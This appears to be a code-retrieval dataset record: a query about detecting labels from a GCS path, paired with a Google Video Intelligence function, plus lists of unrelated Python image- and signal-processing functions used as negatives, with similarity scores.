hidden_size, min_timescale=1.0, max_timescale=1.0e4):\n import math\n position = tf.to_float(tf.range(length))\n num_timescales = hidden_size // 2\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n (tf.to_float(num_timescales) - 1))\n inv_timescales = min_timescale * tf.exp(\n tf.to_float(tf.range(num_timescales)) * -log_timescale_increment)\n scaled_time = tf.expand_dims(position, 1) * tf.expand_dims(inv_timescales, 0)\n signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)\n return signal", "def write(self, image):\n raise NotImplementedError()", "def encode(self, x):\n self.eval()\n x = torch.as_tensor(x).unsqueeze(0)\n if self.do_mt:\n enc_output, _ = self.encoder_mt(x, None)\n else:\n enc_output, _ = self.encoder(x, None)\n return enc_output.squeeze(0)", "def preprocess(img):\n \n scaler=StandardScaler() ## scaler object to perform preprocessing\n img=scaler.fit_transform(img) ## zero-center and normalize\n \n return img", "def mulaw_quantize(x, quantization_channels=256):\n mu = quantization_channels - 1\n if isinstance(x, np.ndarray):\n x_mu = np.sign(x) * np.log1p(mu * np.abs(x)) / np.log1p(mu)\n x_mu = ((x_mu + 1) / 2 * mu + 0.5).astype(int)\n elif isinstance(x, (torch.Tensor, torch.LongTensor)):\n\n if isinstance(x, torch.LongTensor):\n x = x.float()\n mu = torch.FloatTensor([mu])\n x_mu = torch.sign(x) * torch.log1p(mu * torch.abs(x)) / torch.log1p(mu)\n x_mu = ((x_mu + 1) / 2 * mu + 0.5).long()\n return x_mu", "def encode(self, x):\n mu = []\n logvar = []\n for i in range(self.n_views):\n mu_, logvar_ = self.encoders[i](x[i])\n mu.append(mu_)\n logvar.append(logvar_)\n mu = torch.stack(mu)\n logvar = torch.stack(logvar)\n mu_out, logvar_out = self.join_z(mu, logvar)\n qz_x = hydra.utils.instantiate( \n self.cfg.encoder.default.enc_dist, loc=mu_out, scale=logvar_out.exp().pow(0.5)\n )\n return [qz_x]", "def process(self, image, annotation_meta=None):\n # image dasta stored inside DataRepresentation in data field\n data = image.data\n # internally we work with numpy arrays, so we need to convert it to pillow image object for making resize\n resized_data = Image.fromarray(data).resize((self.size, self.size), Image.ANTIALIAS)\n # return back data to numpy array\n data = np.array(resized_data)\n # expand dims for gray scale image\n if len(data.shape) == 2:\n data = np.expand_dims(data, axis=-1)\n image.data = data\n # return updated DataRepresentation\n return image", "def preprocess_image(image):\n\n image = tf.to_float(image)\n image = tf.subtract(image, 128.0)\n image = tf.div(image, 128.0)\n return image", "def encode(self, img):\n with tf.variable_scope('encoder'):\n #conv1 = self.conv_layer(\n # img, [5, 5], [3, 32], stride=2, initializer_type=1, name='conv1')\n #conv2 = self.conv_layer(\n # conv1, [5, 5], [32, 32], stride=2, initializer_type=1, name='conv2')\n conv3 = self.conv_layer(\n img, [5, 5], [self.in_channels, 64], stride=2, initializer_type=1, name='conv3')\n #conv4 = self.conv_bn_layer(\n conv4 = self.conv_layer(\n conv3, [5, 5], [64, 128], stride=2, #is_training=self.is_training,\n initializer_type=1, name='conv4')\n #conv5 = self.conv_bn_layer(\n conv5 = self.conv_layer(\n conv4, [5, 5], [128, 256], stride=2, #is_training=self.is_training,\n initializer_type=1, name='conv5')\n shape = conv5.get_shape().as_list()\n feature_map_size = shape[1]*shape[2]*shape[3]\n conv5_flat = tf.reshape(\n conv5, [-1, feature_map_size], 'conv5_flat')\n #fc6 = self.fc_bn_layer(conv5_flat, 1024, is_training=self.is_training,\n fc6 = self.fc_layer(conv5_flat, 1024,\n initializer_type=1, name='fc6')\n #fc7 = self.fc_layer(fc6, 1024, initializer_type=1, name='fc7')\n return fc6, shape", "def adjust(self, image):\n ...", "def encode(self, data, scaling=True):\n\n encoded = encode_data(data,\n self._codec['datas'],\n self._codec['formats'],\n scaling)\n encoded |= (0x80 << (8 * self._length))\n encoded = hex(encoded)[4:].rstrip('L')\n\n return binascii.unhexlify(encoded)[:self._length]", "def normalize(self) -> \"CharacterizationPixel\":\n return replace(\n self,\n data=self.data/self.norm,\n mean=self.mean/self.norm,\n norm=np.ones_like(self.norm),\n )", "def encode(self, signal: np.ndarray, window: int = None, threshold: float = None) -> np.ndarray:\n\n # Initializing the spike train to be an array of zeros with same number of timesteps as the signal.\n spikes = np.zeros(signal.shape, dtype=np.int8)\n\n # If window value is passed to the function, it is used. Otherwise window value passed during initalization is used.\n if window == None:\n window = self.window\n\n # If threshold value is passed to the function, it is used. Otherwise threshold value passed during initalization is used.\n if threshold == None:\n threshold = self.threshold\n\n # Saving the first value of the `signal` for `decode()`.\n self.initial_val = signal[0]\n\n # `base` stores sliding window mean\n rolling_mean = uniform_filter1d(signal, window)[\n (window//2):signal.size-((window-1)//2)]\n base = np.concatenate(\n (np.full(window-1, rolling_mean[0]), rolling_mean))\n\n # Wherever difference between signal and base is more than threshold, spike is encoded.\n spikes = np.where(signal > base+threshold, 1, spikes)\n spikes = np.where(signal < base-threshold, -1, spikes)\n\n # Returns spike train.\n return spikes", "def encode(self, x: Tensor) ->Tensor:\n return self.encoder(x)[0]", "def quantize(image_patch, gray_levels=12, n_stddev=2):\n # compute gray level gaussian stats\n mean = np.mean(image_patch)\n stddev = np.std(image_patch)\n # logger.debug('mean: {!s}\\nstd dev: {!s}'.format(mean, stddev))\n bin_width = 2*n_stddev*stddev / (gray_levels-2)\n # logger.debug('bin_width: {!s}'.format(bin_width))\n\n # rebin values into new quanization, first and last bins hold outliers\n quantized_image_patch = np.zeros_like(image_patch, dtype=np.int8)\n it = np.nditer(image_patch, op_flags=['readwrite'], flags=['multi_index'])\n while not it.finished:\n val = image_patch[it.multi_index]\n quantized_image_patch[it.multi_index] = min(gray_levels-1, max(0, math.floor(((val - mean + n_stddev*stddev)/(bin_width+1e-9))+1)))\n it.iternext()\n\n # import matplotlib.pyplot as plt\n # xy_shape = quantized_image_patch.shape[1:]\n # for z in range(quantized_image_patch.shape[0]):\n # fig = plt.figure()\n # ax = fig.add_subplot(1,2,1)\n # ax.imshow(image_patch[z,:,:].reshape(xy_shape), cmap='gray')\n # ax = fig.add_subplot(1,2,2)\n # ax.imshow(quantized_image_patch[z,:,:].reshape(xy_shape), cmap='gray', vmin=0, vmax=gray_levels-1)\n # plt.show()\n return quantized_image_patch", "def scale(self):", "def compress(self, tensor):", "def data64(self, value: str) -> None:\n self.data = Image.decode64(value)", "def _encode_img_observation(self, idx):\n hi = idx + 1 # make noninclusive\n lo = hi - self.obs_len\n\n for i in range(lo, hi - 1):\n if self.dones[i % self._maxsize]:\n lo = i + 1\n missing = self.obs_len - (hi - lo)\n\n # We need to duplicate the lo observation\n if missing > 0:\n frames = [self.states[lo % self._maxsize] for _ in range(missing)]\n for i in range(lo, hi):\n frames.append(self.states[i % self._maxsize])\n stack_state = np.stack(frames, axis=-1)\n # We are on the boundary of the buffer\n elif lo < 0:\n frames = [self.states[lo:], self.states[:hi]]\n frames = np.concatenate(frames, 0)\n stack_state = frames.transpose((1, 2, 0))\n # The standard case\n else:\n stack_state = self.states[lo:hi].transpose((1, 2, 0))\n\n assert stack_state.shape == (84, 84, 4)\n return stack_state", "def quantize(im_orig, n_quant, n_iter):\n shape_len = len(im_orig.shape)\n if shape_len == 2: # grayscale\n return quantization_helper(im_orig, n_quant, n_iter)\n\n elif shape_len == 3: # rgb\n im_yiq = rgb2yiq(im_orig)\n y = im_yiq[:, :, 0]\n y_quant, error = quantization_helper(y, n_quant, n_iter)\n y_quant = y_quant/ 255\n im_yiq[:, :, 0] = y_quant\n im_quants = yiq2rgb(im_yiq)\n return im_quants, error", "def get_position_encoding(\n length, hidden_size, min_timescale=1.0, max_timescale=1.0e4):\n position = tf.cast(tf.range(length), dtype=tf.float32)\n num_timescales = hidden_size // 2\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n (tf.cast((num_timescales) - 1, dtype=tf.float32)))\n inv_timescales = min_timescale * tf.exp(\n tf.cast(tf.range(num_timescales), dtype=tf.float32) * -log_timescale_increment)\n scaled_time = tf.expand_dims(position, 1) * tf.expand_dims(inv_timescales, 0)\n signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)\n return signal", "def encode(self):\n with tf.name_scope(\"encode\"):\n self.encoder_inputs = tf.layers.dense(\n inputs=self.encoder_inputs,\n units=self.options['hidden_size'], activation=None, use_bias=True,\n kernel_initializer=tf.keras.initializers.he_normal(seed=None),\n bias_initializer=tf.zeros_initializer(),\n kernel_regularizer=None, bias_regularizer=None, activity_regularizer=None,\n kernel_constraint=None, bias_constraint=None, trainable=True,\n name=None, reuse=None)\n self.encoder_inputs = tf.layers.batch_normalization(self.encoder_inputs,\n axis=-1,\n momentum=0.99,\n epsilon=0.001,\n center=True,\n scale=True,\n beta_initializer=tf.zeros_initializer(),\n gamma_initializer=tf.ones_initializer(),\n moving_mean_initializer=tf.zeros_initializer(),\n moving_variance_initializer=tf.ones_initializer(),\n training=self.is_training,\n trainable=True,\n renorm=False,\n renorm_momentum=0.99)\n # Prepare inputs to the layer stack by adding positional encodings and\n # applying dropout.\n # embedded_inputs = self.embedding_softmax_layer(inputs)\n #\n inputs_padding = transformer_model_utils.get_padding(tf.cast(\n tf.reduce_max(100*self.encoder_inputs, [-1]),\n dtype=tf.int32))\n\n with tf.name_scope(\"add_pos_encoding\"):\n length = tf.shape(self.encoder_inputs)[1]\n pos_encoding = transformer_model_utils.get_position_encoding(\n length, self.options[\"hidden_size\"])\n encoder_inputs = self.encoder_inputs + pos_encoding\n\n if self.is_training:\n encoder_inputs = tf.nn.dropout(\n encoder_inputs, 1 - self.options[\"layer_postprocess_dropout\"])\n\n return self.encoder_stack(encoder_inputs, self.attention_bias, inputs_padding)", "def encode(self, signal: np.ndarray, threshold: float = None) -> np.ndarray:\n\n # Initializing the spike train to be an array of zeros with same number of timesteps as the signal.\n spikes = np.zeros(signal.shape, dtype=np.int8)\n\n # If threshold value is passed to the function, it is used. Otherwise threshold value passed during initalization is used.\n if threshold == None:\n threshold = self.threshold\n\n # Saving the first value of the signal for decode function.\n self.initial_val = signal[0].copy()\n\n # Initializing base to first value of the signal. .copy() used to avoid affecting the input signal.\n base = signal[0].copy()\n\n # Iterating over all timesteps\n for t in range(1, signal.size):\n\n # If signal value at time step t is greater than base+threshold, a positive spike is encoded.\n if signal[t] >= base + threshold:\n spikes[t] = 1\n base += threshold\n\n # If signal value at time step t is less than base-threshold, a negative spike is encoded.\n elif signal[t] <= base - threshold:\n spikes[t] = -1\n base -= threshold\n\n # Returns spike train\n return spikes", "def send_processd_for_prediction(self):\n resized_image = cv2.resize(self.processed_image, (28, 28))\n self.send_proccesd_image_to_ML.emit(resized_image)", "def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):\n length = tf.shape(x)[1]\n channels = tf.shape(x)[2]\n signal = get_timing_signal_1d(\n length, channels, min_timescale, max_timescale)\n return x + signal", "def normalize_data_unit_interval(data):\n if data.dtype == 'float32':\n return\n return data.astype('float32') / 255.0", "def requantize(image, level_num=8):\n M, N = image.shape\n level_space = np.linspace(0, 255, level_num)\n out_img = np.zeros([M, N], dtype='uint8')\n for i in range(M):\n for j in range(N):\n out_img[i, j] = min(level_space, key=lambda x: abs(x - image[i, j]))\n\n return out_img.astype('uint8')", "def adjust_image_data(self):\r\n\r\n print('Adjusting image data: ')\r\n\r\n if self.removeFirstSequence: # used to remove the first trial from the sequence\r\n\r\n frames_per_rep = self.nFrames/self.nrepetitions\r\n\r\n self.imageData = self.imageData[frames_per_rep:, :, :]\r\n\r\n self.nFrames = self.imageData.shape[0]\r\n\r\n self.nrepetitions = int(self.nFrames/(self.period * self.framerate))\r\n\r\n self.times = np.arange(0, self.nFrames/self.framerate, 1.0/self.framerate)\r\n\r\n \r\n\r\n # first squeeze the image to 3d if it is 4d\r\n\r\n maxt = np.max(self.times) # find last image time\r\n\r\n sh = self.imageData.shape\r\n\r\n if len(sh) == 4:\r\n\r\n self.imageData = self.imageData.squeeze()\r\n\r\n sh = self.imageData.shape\r\n\r\n dt = np.mean(np.diff(self.times)) # get the mean dt\r\n\r\n n_Periods = int((maxt+dt)/self.period) # how many full periods in the image set - include the first?\r\n\r\n if self.nrepetitions > 0 and self.nrepetitions < n_Periods:\r\n\r\n n_Periods = self.nrepetitions\r\n\r\n n_PtsPerCycle = int(np.floor(self.period/dt)); # estimate image points in a stimulus cycle\r\n\r\n ndt = self.period/n_PtsPerCycle\r\n\r\n self.imageData = self.imageData[range(0, n_Periods*n_PtsPerCycle),:,:] # reduce to only what we need\r\n\r\n print (' Adjusted image info')\r\n\r\n print (\" # Periods: %d Pts/cycle: %d Cycle dt %8.4fs (%8.3fHz) Cycle: %7.4fs\" %(n_Periods, n_PtsPerCycle, ndt, 1.0/ndt, self.period))\r\n\r\n self.print_image_info()", "def _momentum_update_key_encoder(self):\n for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):\n param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)", "def encode(data, encoder):\n # Get the list of hidden depths\n\thd = encoder.hidden_depths\n # Find the middle hidden layer\n\tmiddle_layer_index = (len(hd)-1)/2\n # Initialize empty container for the encoded data\n\tdata_encoded = np.zeros((data.shape[0],hd[middle_layer_index]))\n\tfor i, d_ in enumerate(data):\n # feed forward, get all the activations, and just keep\n # the middle layer, which is the encoding\n\t\tx, z_container, x_container = encoder.ff(d_,True,True)\n\t\tx_encoded = x_container[1+middle_layer_index]\n\t\tdata_encoded[i] = x_encoded\n\t#\n\treturn data_encoded", "def preprocess(self, data):\n (w,h,f) = self.rawinputformat()\n dt = numpy.dtype(numpy.uint8)\n nb = numpy.frombuffer(data,dt,-1,0)\n actual_stream_width = (w&1)+w # hack, rather get this from the app sink\n if(actual_stream_width != self.reqsize):\n nb = nb.reshape(h,actual_stream_width,3)\n nb = nb[0:h,0:w,0:3] # crop to network input size\n else:\n nb = nb.reshape((actual_stream_width,actual_stream_width,3))\n img = nb.astype('float32')\n #Preprocess image\n #for i in range(3):\n # img[:,:,i] = (img[:,:,i] - self.mean[i]) * self.std[i]\n #img = resize(img/255.0,(w,h),1)\n img = img/255.0\n print(img.shape)\n #print(img[0,0,:])\n return img.astype(numpy.float16)", "def forward(self, x):\n # Get results of encoder network\n q = self.encode_nn(x)\n\n return q", "def base_encoder(cls, data, data_mask, init_encoder, downsize_encoder, input_encoder):\n data = downsize_encoder(init_encoder(data))\n return input_encoder(data, data_mask)", "def encode(self, message: str) -> None:\n image = self._original_image.copy()\n width, height = image.size\n pixels = image.load()\n\n binary_string = self._str_to_binary_string(message + self._end_message)\n tribit_list = self._split(binary_string, 3)\n\n for x_pixel in range(width):\n for y_pixel in range(height):\n tribit = tribit_list.pop(0)\n rgb_binary = self._rgb_to_binary(pixels[x_pixel, y_pixel])\n new_pixel = self._write_to_lsb(tribit, rgb_binary)\n\n if len(new_pixel) < 3:\n new_pixel = self._complete_list(new_pixel, list(rgb_binary))\n\n pixels[x_pixel, y_pixel] = self._binary_to_rgb(*new_pixel)\n\n if not tribit_list:\n break\n else:\n continue\n break\n\n self._encoded_image = image", "def __resize_512p(input_data):\n rate = 1\n test_size=512\n if input_data['img'].shape[0] > input_data['img'].shape[1]:\n if True: # input_data['img'].shape[1] < 512:\n rate = test_size / input_data['img'].shape[1]\n seq = iaa.Sequential([\n iaa.Scale({'height': \"keep-aspect-ratio\", 'width': test_size}, 'cubic')\n ])\n input_data['img'] = seq.augment_image(input_data['img'])\n else:\n if True: # input_data['img'].shape[0] < 512:\n rate = test_size / input_data['img'].shape[0]\n seq = iaa.Sequential([\n iaa.Scale({'height': test_size, 'width': \"keep-aspect-ratio\"}, 'cubic')\n ])\n input_data['img'] = seq.augment_image(input_data['img'])\n\n if DataAugmentor._is_synthtext(input_data):\n input_data['contour'] = [[np.cast['int32'](contour * rate) for contour in contours] for contours in\n input_data['contour']]\n else:\n input_data['contour'] = [np.cast['int32'](contour * rate) for contour in input_data['contour']]\n input_data['center_point'] = [(np.cast['int32'](point[0] * rate),\n np.cast['int32'](point[1] * rate)) for point in input_data['center_point']]\n return input_data", "def preprocess(self, resized_inputs):\n return (2.0 / 255.0) * resized_inputs - 1.0", "def img_prep(img, shape=(128, 128)):\n # Resize\n img = resize_volume(img, (shape[0], shape[1]))\n\n img = numpy.multiply(255, _normalize(img)).astype(numpy.uint8)\n\n return img", "def embed_image_pred(image):\n image_pil2 = Image.fromarray((255 * image).astype('uint8'))\n #image_pil2 = image_pil.resize((256, 256))\n string_buf2 = StringIO.StringIO()\n image_pil2.save(string_buf2, format='png')\n data = string_buf2.getvalue().encode('base64').replace('\\n', '')\n return 'data:image/png;base64,' + data", "def small_image(self):\n pass", "def jpeg_quantize(block: np.ndarray, option: model.QTables):\n t = table[option]\n return deadzone_quantize(block, t)", "def kmeansQuantise(image, quantisation_levels=64):\n K = quantisation_levels\n N_ATTEMPTS = 10\n MAX_ITER = 300\n TOL = 0.0001\n\n km = KMeans(\n n_clusters=K, n_init=N_ATTEMPTS, max_iter=MAX_ITER, tol=TOL,\n n_jobs=-1\n )\n\n z = np.float32(image.reshape(-1, 3))\n\n labels = km.fit_predict(z)\n centres = km.cluster_centers_\n\n res = centres[labels]/(256/K)\n res = res.astype(np.uint8)\n image_q = res.reshape((IMG_RES_M, IMG_RES_N, 3))\n\n return image_q", "def fit(self, signal):\n self.signal = signal", "def _encode_value(value):\n # leave numbers alone\n if isinstance(value, (int, long, float)):\n return value\n\n # leave Nones alone (they turn into null in JSON)\n if value is None:\n return value\n\n # convert datetime to str\n if isinstance(value, datetime.datetime):\n # return, don't go through truncation\n return str(value)\n\n # represent image as base64-encoded bytes\n import binascii\n from graphlab.data_structures.image import Image\n if isinstance(value, Image):\n image_format = None\n if value._format_enum == 0:\n image_format = 'jpeg'\n elif value._format_enum == 1:\n image_format = 'png'\n elif value._format_enum == 2:\n image_format = 'raw'\n if image_format is not None:\n ret = {\n 'type': 'image',\n 'width': value._width,\n 'height': value._height,\n 'channels': value._channels,\n 'format': image_format,\n 'id': id(value)\n }\n if image_format in ('jpeg', 'png'):\n ret.update({\n 'value': 'image/%s;base64,%s' % (image_format, binascii.b2a_base64(value._image_data))\n })\n elif image_format == 'raw':\n ret.update({\n 'value': list(value._image_data)\n })\n return ret\n\n # fallback case for images the browser does not know how to display\n # just convert to str and treat like any other type\n value = str(value)\n\n # convert strings to unicode (assumes utf-8 encoding, replaces invalid\n # characters with ?\n if isinstance(value, str) and sys.version_info.major == 2:\n value = unicode(value, encoding='utf-8', errors='replace')\n\n # get the array into a list so it is JSON serializable\n if isinstance(value, array.array):\n value = value.tolist()\n\n # truncate to 10 elements first\n if isinstance(value, (array.array, list)):\n value = value[:10]\n elif isinstance(value, dict):\n keys = value.keys()[:10]\n truncated = {}\n for key in keys:\n truncated[key] = value[key]\n value = truncated\n\n # get dict/list values properly encoded inside before dumping to str\n if isinstance(value, list):\n value = [_encode_value(v) for v in value]\n elif isinstance(value, dict):\n value = {_encode_value(k): _encode_value(v) for (k,v) in six.iteritems(value)}\n\n # json serialize dict/list types to convert to string\n if isinstance(value, (dict, list)):\n value = _to_json(value)\n\n # truncate via textwrap (will break on word boundaries if possible)\n wrapped = textwrap.wrap(value, 18)\n if len(wrapped) == 0:\n return ''\n\n return '%s%s' % (\n wrapped[0],\n '' if len(wrapped) == 1 else ' ...'\n )", "def quantise(images, q_levels):\n return (np.digitize(images, np.arange(q_levels) / q_levels) - 1).astype('float32')", "def quantise(images, q_levels):\n return (np.digitize(images, np.arange(q_levels) / q_levels) - 1).astype('float32')", "def quantise(images, q_levels):\n return (np.digitize(images, np.arange(q_levels) / q_levels) - 1).astype('float32')", "def __init__(self):\n super(BaseRNNEncoder, self).__init__()", "def convert_for_MaskRCNN(self, input_img):\r\n if input_img.shape[0] > 1024 or input_img.shape[1] > 1024:\r\n resized_img = resize(input_img,[1024,1024],preserve_range=True).astype(input_img.dtype)\r\n \r\n minval = np.min(resized_img)\r\n maxval = np.max(resized_img)\r\n \r\n return ((resized_img-minval)/(maxval-minval)*255).astype(np.uint8)", "def resize_128(img): \n return cv2.resize(img,(128,128))", "def make_big_e(self):\n l = self.l_i\n self.img[l/2-1:l/2+1, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2-3, l/2-5:l/2+5] = 1\n self.img[l/2+3:l/2+5, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2+5, l/2-5:l/2-3] = 1\n self.img_name = 'bigE'", "def rivine_binary_encode(self, encoder):\n pass", "def normalize(\n self,\n image: np.ndarray,\n data_format: Optional[Union[str, ChannelDimension]] = None,\n input_data_format: Optional[Union[str, ChannelDimension]] = None,\n ) -> np.ndarray:\n image = rescale(image=image, scale=1 / 127.5, data_format=data_format, input_data_format=input_data_format)\n image = image - 1\n return image", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def preparing_tocut(image):\n\n _, image = threshold_image(image)\n\n return image", "def _preprocess_image(self, image_raw):\n\n image = tf.io.decode_raw(image_raw, tf.float64)\n\n return image * self.rescale", "def write(self, image, **kwargs):\n\n if self.img is None:\n raise IOError(\"No data found for current image, load data first\")\n\n if self.img.timestamp is None:\n raise IOError(\"No time stamp found for current image.\")\n\n lons = np.unique(self.img.lon.flatten())\n lats = np.flipud(np.unique(self.img.lat.flatten()))\n\n mode = 'w' if not os.path.isfile(image) else 'a'\n ds = Dataset(image, mode=mode, **kwargs)\n\n ds.set_auto_scale(True)\n ds.set_auto_mask(True)\n\n units = 'Days since 2000-01-01 00:00:00'\n\n if mode == 'w':\n ds.createDimension('timestamp', None) # stack dim\n ds.createDimension('lat', len(lats))\n ds.createDimension('lon', len(lons))\n\n # this is not the obs time, but an image time stamp\n ds.createVariable('timestamp', datatype=np.double, dimensions=('timestamp',),\n zlib=True, chunksizes=None)\n ds.createVariable('lat', datatype='float64', dimensions=('lat',), zlib=True)\n ds.createVariable('lon', datatype='float64', dimensions=('lon',), zlib=True)\n\n ds.variables['timestamp'].setncatts({'long_name': 'timestamp',\n 'units': units})\n ds.variables['lat'].setncatts({'long_name': 'latitude', 'units': 'Degrees_North',\n 'valid_range': (-90, 90)})\n ds.variables['lon'].setncatts({'long_name': 'longitude', 'units': 'Degrees_East',\n 'valid_range': (-180, 180)})\n\n ds.variables['lon'][:] = lons\n ds.variables['lat'][:] = lats\n ds.variables['timestamp'][:] = np.array([])\n\n this_global_attrs = \\\n OrderedDict([('subset_img_creation_time', str(datetime.now())),\n ('subset_img_bbox_corners_latlon', str(self.grid.bbox)),\n ('subset_software', f\"{dist_name} | {subdist_name} | {__version__}\")])\n glob_attrs = self.glob_attrs\n for k in ['ease_global', 'history', 'creation_time', 'NCO']:\n try:\n glob_attrs.pop(k)\n except KeyError:\n continue\n glob_attrs.update(this_global_attrs)\n ds.setncatts(glob_attrs)\n\n idx = ds.variables['timestamp'].shape[0]\n ds.variables['timestamp'][idx] = date2num(self.img.timestamp, units=units)\n\n for var, vardata in self.img.data.items():\n\n if var not in ds.variables.keys():\n ds.createVariable(var, vardata.dtype, dimensions=('timestamp', 'lat', 'lon'),\n zlib=True, complevel=6)\n ds.variables[var].setncatts(self.img.metadata[var])\n\n ds.variables[var][-1] = vardata\n\n ds.close()", "def value(self, data, image=None):\n raise NotImplementedError", "def scaleLandsat(self,img):\n\t\tthermal = img.select(ee.List(['thermal'])).multiply(0.1)\n\t\tscaled = ee.Image(img).select(self.env.divideBands).multiply(ee.Number(0.0001))\n\t\t\n\t\treturn img.select([]).addBands(scaled).addBands(thermal)", "def preprocess(self, frame: np.ndarray) -> torch.TensorType:\n tensor = cv.resize(frame, (self.IMGSZ, self.IMGSZ)) \n tensor = tensor.transpose(2, 0, 1)\n tensor = torch.from_numpy(tensor)\n tensor = torch.unsqueeze(tensor, 0)\n tensor = tensor.half() if self.half else tensor.float()\n tensor = tensor / 255.0\n tensor = tensor.to(self.device)\n\n return tensor", "def encode(self) :\n\t\tbitmap = ISO8583Bitmap()\n\t\ttexts=[]\n\t\tfor i in range(2,129) :\n\t\t\tid = 'f%03d' % i\n\t\t\tif hasattr(self,id) :\n\t\t\t\tv = getattr(self,id)\n\t\t\t\ttyp = self.desc_dict[id]['type']\n\t\t\t\tbitmap.setBitmap(i)\n\t\t\t\t# logit(\"%s:%s\" % (id,v))\n\t\t\t\ttxt = dataAttachTo8583(v,typ)\n\t\t\t\ttexts.append(txt)\n\t\treturn (bitmap,''.join(texts))", "def _fit_encoder(self, frame, prop, encoder_type=\"category\"):\n pass", "def quantization_error(self, in_tensor, bits=32):\n raise NotImplementedError('To be Overidden for derived class')", "def upsample(self, method):\n from scipy.signal import resample\n from scipy.ndimage.interpolation import zoom\n #print \"mm: 100 x 100 x 131\"\n #print \"Dims:\", self.D.shape\n fact = np.array(self.info.shape).astype(\"float32\") / np.array(self.info.read_shape).astype(\"float32\")+0.00001 # hrmpf!!\n if method == \"zoom\":\n print \"Resampling...\"\n self.D = zoom(self.D, fact).astype(\"float32\")\n elif method == \"resample\":\n print \"Resampling...\"\n a = self.info.resample_ax\n s = self.info.shape[a]\n self.D = resample(self.D, s, axis=a, window=10).astype(\"float32\")\n elif method == None:\n pass\n else:\n raise NotImplementedError(\"Unknown upsampling method: %s\" % method)\n #print \"Dims:\", self.D.shape\n print \"done.\"" ]
[ "0.5878991", "0.58486336", "0.5828887", "0.57244307", "0.56981575", "0.54445195", "0.5440825", "0.5357206", "0.53013325", "0.5262915", "0.5184929", "0.5019855", "0.5011705", "0.49735066", "0.49495837", "0.49373123", "0.49359372", "0.4922893", "0.49128926", "0.49051914", "0.4884795", "0.48826027", "0.48787814", "0.48632252", "0.48571002", "0.48559126", "0.48408574", "0.48230052", "0.4814351", "0.4813384", "0.4812437", "0.48026094", "0.47944146", "0.4790053", "0.47900224", "0.47869408", "0.4772545", "0.47573578", "0.47396287", "0.47369927", "0.47369558", "0.47362232", "0.4720382", "0.47142673", "0.47119185", "0.4710888", "0.47093257", "0.47025663", "0.4686035", "0.46820965", "0.46711147", "0.4670181", "0.4670046", "0.4659068", "0.46559787", "0.46510088", "0.46430677", "0.4641861", "0.46357322", "0.46346167", "0.46341708", "0.4631191", "0.46309033", "0.4628997", "0.46270263", "0.4625135", "0.46245056", "0.4624419", "0.46242517", "0.46214533", "0.46191633", "0.46181077", "0.461153", "0.46079645", "0.4606172", "0.45897135", "0.45847815", "0.4584322", "0.45807087", "0.4574992", "0.4574265", "0.45741445", "0.45741445", "0.45741445", "0.45655367", "0.4562134", "0.45574203", "0.45562935", "0.45523953", "0.4548068", "0.45381775", "0.45329788", "0.4532044", "0.45309243", "0.45283052", "0.45269227", "0.45256108", "0.45220596", "0.45164102", "0.45163625", "0.4514619" ]
0.0
-1
Detects labels given a GCS path.
def main(path): video_client = (video_intelligence_service_client. VideoIntelligenceServiceClient()) features = [enums.Feature.LABEL_DETECTION] video_context = video_intelligence_pb2.VideoContext() video_context.stationary_camera = True video_context.label_detection_mode = video_intelligence_pb2.FRAME_MODE operation = video_client.annotate_video(path, features, video_context=video_context) print('\nProcessing video for label annotations:') while not operation.done(): sys.stdout.write('.') sys.stdout.flush() time.sleep(10) print('\nFinished processing.') results = operation.result().annotation_results[0] return(results)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def detect_labels(path):\n client = vision.ImageAnnotatorClient()\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n response = client.label_detection(image=image)\n labels = response.label_annotations\n print('Labels:')\n return response", "def detect_labels(path):\n client = vision.ImageAnnotatorClient()\n\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.types.Image(content=content)\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n #print('Labels:')\n\n #for label in labels:\n # print(label.description)\n return labels", "def detect_labels(path):\n from google.cloud import vision\n client = vision.ImageAnnotatorClient()\n\n # [START vision_python_migration_label_detection]\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.types.Image(content=content)\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n ss=labels[0].description \n ss.split('/')[0]\n os.system(\"./ILOVEAPPLE/sort {} {}\".format(ss, path))\n # [END vision_python_migration_label_detection]", "def validate_labels(labels, path):\n for labels_ in labels.values():\n for label in labels_:\n for ann in label['annotations']:\n assert len(ann['segmentation']) == 1\n assert len(ann['segmentation'][0]) % 2 == 0\n\n label['annotations'] = [\n ann\n for ann in label['annotations']\n if len(ann['segmentation'][0]) >= 6\n ]\n assert len(label['annotations']) > 0\n label['file_name'] = path + '/' + label['file_name']\n\n for k in labels:\n labels[k] = [\n label for label in labels[k]\n if os.path.exists(label['file_name'])\n ]\n return labels", "def load_labels(path, kmer=True, rg=True, clip=True, rna=True, go=True):\n\n labels = dict()\n if go: labels[\"X_GO\"] = gzip.open(os.path.join(path,\n \"matrix_GeneOntology.tab.gz\")).readline().split(\"\\t\")\n if kmer: labels[\"X_KMER\"] = gzip.open(os.path.join(path,\n \"matrix_RNAkmers.tab.gz\")).readline().split(\"\\t\")\n if rg: labels[\"X_RG\"] = gzip.open(os.path.join(path,\n \"matrix_RegionType.tab.gz\")).readline().split(\"\\t\")\n if clip: labels[\"X_CLIP\"] = gzip.open(os.path.join(path,\n \"matrix_Cobinding.tab.gz\")).readline().split(\"\\t\")\n if rna: labels[\"X_RNA\"] = gzip.open(os.path.join(path,\n \"matrix_RNAfold.tab.gz\")).readline().split(\"\\t\")\n return labels", "def load_labels(self, pathLabel):\n self.pathLabel = pathLabel\n self.labelList = os.listdir(pathLabel)", "def load_label(path: str) -> dict:\n if not os.path.exists(path):\n print(f\"Warning, try to load non-exist label 